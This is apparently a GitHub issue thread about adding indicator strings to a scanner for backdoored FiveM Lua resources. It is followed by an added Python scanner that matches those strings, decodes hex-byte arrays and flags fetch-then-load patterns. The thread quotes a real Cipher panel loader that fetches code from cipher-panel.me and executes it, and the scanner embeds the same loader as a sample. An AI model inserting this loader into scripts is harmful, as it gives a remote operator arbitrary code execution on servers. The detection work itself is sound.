Closed Blitoka33 closed 2 years ago
Which exploits actually employ these strings? as far as i'm aware most exploits dont openly name themselves in the scripts..
Cipher installs a cipher-panel.me PerformHttpRequest into scripts, so it does. servduster is a private one (most likely a Cipher copy, from what I saw) that I saw in some servers (this is not their real name, just a random domain). remotecontroller is a casual suspicious string; it's a string for some runcode exploits.
The examples of Cipher panel payloads I saw were all hexadecimal; that's what the "'68', '74', '74', '70', '73', '3a'" actually is.
Do you have a sample of these payloads?
Yes, I can.
```lua
-- Sample as observed: fetches a script body from the panel (keyed by the user id)
-- and executes whatever comes back. Note the nil check sits after load() as posted.
PerformHttpRequest('https://cipher-panel.me/_i/i?to=qJDxOx', function (e, d)
    local s = assert(load(d))
    if (d == nil) then return end
    s()
end)
```
qJDxOx is the userid as far as I know.
I saw it in servers having issues with cipher.
Odd, all cases I saw of it used obfuscated code. I'll merge it anyhow.
I just added 3 infected strings to detect more stuff: "cipher", "servduster", "remotecontroller".
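A small scanner illustrating how these indicators can be matched in resource scripts, covering both the plain strings and the hex-byte form ('68', '74', '74', '70', '73', '3a') mentioned above, plus the fetch-then-load() shape of the posted snippet. This is an added example, not this project's code; the regexes, function names and the constructed sample scripts are assumptions of mine.

```python
import re

# Indicator strings from the thread: the three added ones plus the loader domain.
INDICATORS = ("cipher", "servduster", "remotecontroller", "cipher-panel.me")

# Runs of quoted two-digit hex bytes such as '68', '74', '74', '70' (which decodes to "http").
HEX_ARRAY_RE = re.compile(r'''(?:['"][0-9a-fA-F]{2}['"]\s*,\s*){3,}['"][0-9a-fA-F]{2}['"]''')
# A remote fetch whose response body is handed to load(): the loader shape in the sample.
REMOTE_LOADER_RE = re.compile(r"PerformHttpRequest\s*\(.*?\bload\s*\(", re.S)


def decode_hex_array(literal: str) -> str:
    """Turn "'68', '74', '74', '70'" into the text it encodes."""
    pairs = re.findall(r"[0-9a-fA-F]{2}", literal)
    return bytes(int(p, 16) for p in pairs).decode("latin-1")


def scan_script(source: str) -> list:
    """Return sorted, de-duplicated findings for one script body."""
    findings = set()
    lowered = source.lower()
    for ind in INDICATORS:
        if ind in lowered:
            findings.add(f"plain:{ind}")
    # Decode hex-array literals before matching, so encoded URLs are not missed.
    for m in HEX_ARRAY_RE.finditer(source):
        decoded = decode_hex_array(m.group(0)).lower()
        for ind in INDICATORS:
            if ind in decoded:
                findings.add(f"hex:{ind}")
    if REMOTE_LOADER_RE.search(source):
        findings.add("remote-loader")
    return sorted(findings)


# Constructed samples (hypothetical; the first mirrors the snippet quoted in the thread).
SAMPLE_PLAIN = (
    "PerformHttpRequest('https://cipher-panel.me/_i/i?to=qJDxOx', function (e, d)\n"
    "local s = assert(load(d))\nif (d == nil) then return end\ns()\nend)"
)
SAMPLE_HEX = "local u = table.concat({" + ", ".join(
    f"'{b:02x}'" for b in b"https://cipher-panel.me") + "})"
SAMPLE_CLEAN = "PerformHttpRequest('https://example.invalid/status', function(e, d) print(d) end)"

if __name__ == "__main__":
    for name, body in (("plain", SAMPLE_PLAIN), ("hex", SAMPLE_HEX), ("clean", SAMPLE_CLEAN)):
        print(name, scan_script(body))
```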